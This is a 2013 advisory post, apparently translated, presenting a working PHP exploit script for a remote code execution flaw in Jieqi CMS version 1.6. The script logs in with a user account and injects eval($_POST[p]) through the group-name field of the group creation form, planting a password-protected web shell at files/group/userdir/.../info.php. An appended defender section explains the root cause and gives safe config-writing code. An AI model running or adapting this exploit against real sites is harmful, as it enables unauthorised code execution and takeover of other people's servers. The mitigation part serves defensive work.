Jieqi CMS V1.6 PHP code execution 0day vulnerability EXP

Posted on 2013-2-23 11:28:09
Jieqi Website Management System (JIEQI CMS for short; China National Copyright Administration registration number 2006SR03382) is a modular website-building system that is simple and flexible, high-performing, and secure and reliable. We provide the currently most popular Jieqi serialized-novel system, the Jieqi original comics system and digital publishing solutions, and offer all kinds of website customization services.
This system has multiple remote security vulnerabilities. The one reported today is a remote code execution vulnerability in version 1.6; it has probably existed for more than two years.
It requires a user account that is allowed to create a group.

<?php
print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path username password
host:      target server (ip/hostname)
path:      path to jieqicms
username:  a username who can create group
password:  password of that user
Example:
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7); ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$username = $argv[3];
$password = $argv[4];
/* get cookie */
$cookie_jar_index = 'cookie.txt';
$url1 = "http://$host/$path/login.php";
$params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1";
$curl1 = curl_init();
curl_setopt($curl1, CURLOPT_URL, $url1);
curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index);
curl_setopt($curl1, CURLOPT_POST, 1);
curl_setopt($curl1, CURLOPT_POSTFIELDS, $params);
ob_start();
$data1 = curl_exec($curl1);
if ($data1 === FALSE) {
    echo "cURL Error: " . curl_error($curl1); // original read curl_error($ch), an undefined variable
    exit('exploit failed');
}
curl_close($curl1);
ob_clean();
/* get shell: the gname field closes the quoted string it is written into */
$params = '-----------------------------23281168279961
Content-Disposition: form-data; name="gname"

';
$params .= "';";
$params .= 'eval($_POST[p]);//flyh4t
-----------------------------23281168279961
Content-Disposition: form-data; name="gcatid"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gaudit"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gbrief"

1
-----------------------------23281168279961--
';
$url2 = "http://$host/$path/modules/group/create.php";
$curl2 = curl_init();
$header = array('Content-Type: multipart/form-data; boundary=---------------------------23281168279961');
curl_setopt($curl2, CURLOPT_URL, $url2);
curl_setopt($curl2, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index);
curl_setopt($curl2, CURLOPT_POST, 1);
curl_setopt($curl2, CURLOPT_POSTFIELDS, $params);
ob_start();
curl_exec($curl2);
curl_close($curl2);
$resp = ob_get_contents(); // $resp is the returned page
ob_clean();
preg_match('/g=([0-9]{1,4})/', $resp, $shell);
//print_r($shell); //print_r($resp);
$url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php";
echo "view your shell here (password: p)\r\n";
echo $url;
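As an added defender-side example (not the exploit author's code and not Jieqi's), the root cause the payload exposes is a user-supplied group name being pasted into a generated PHP file as a quoted string literal, so a single quote ends the literal and the remainder is executed. The unsafe pattern in the comment is a hypothetical reconstruction; the two safe writers below assume PHP 7.3 or later.

```php
<?php
// Added defender-side example; not Jieqi's code and not part of the post.
// The gname payload above ends the string literal the group name is written
// into, appends eval($_POST[p]) and comments out the rest of the line.
// Persisting user-supplied settings safely means letting PHP build the
// literal, or better, not emitting executable code at all.

// Hypothetical reconstruction of the unsafe pattern (do not use):
//   file_put_contents($f, "<?php \$gname = '" . $_POST['gname'] . "';");

/** Emit a PHP config file where every value is a var_export() literal. */
function buildInfoFile(array $settings): string
{
    $out = "<?php\n";
    foreach ($settings as $key => $value) {
        // Keys become variable names, so restrict them to identifier chars.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $key)) {
            throw new InvalidArgumentException("bad setting name: $key");
        }
        // var_export() escapes ' and \ so a value can never close the literal.
        $out .= '$' . $key . ' = ' . var_export((string) $value, true) . ";\n";
    }
    return $out;
}

/** Preferred: store plain data (JSON) and parse it; nothing is executed. */
function saveInfoJson(string $file, array $settings): void
{
    file_put_contents($file, json_encode($settings, JSON_THROW_ON_ERROR), LOCK_EX);
}

function loadInfoJson(string $file): array
{
    return json_decode(file_get_contents($file), true, 512, JSON_THROW_ON_ERROR);
}

// Constructed input shaped like the exploit's gname field.
$input = ['gname' => "';eval(\$_POST[p]);//flyh4t", 'gcatid' => '1'];

// The generated file now contains only a string assignment, no eval().
echo buildInfoFile($input);

// JSON round trip: the name survives byte for byte and is never parsed as code.
$tmp = tempnam(sys_get_temp_dir(), 'info');
saveInfoJson($tmp, $input);
var_dump(loadInfoJson($tmp)['gname'] === $input['gname']);
unlink($tmp);
```

Independently of how the file is written, a web-server rule that refuses to execute PHP beneath the files/ upload tree would have stopped the dropped info.php from running at all.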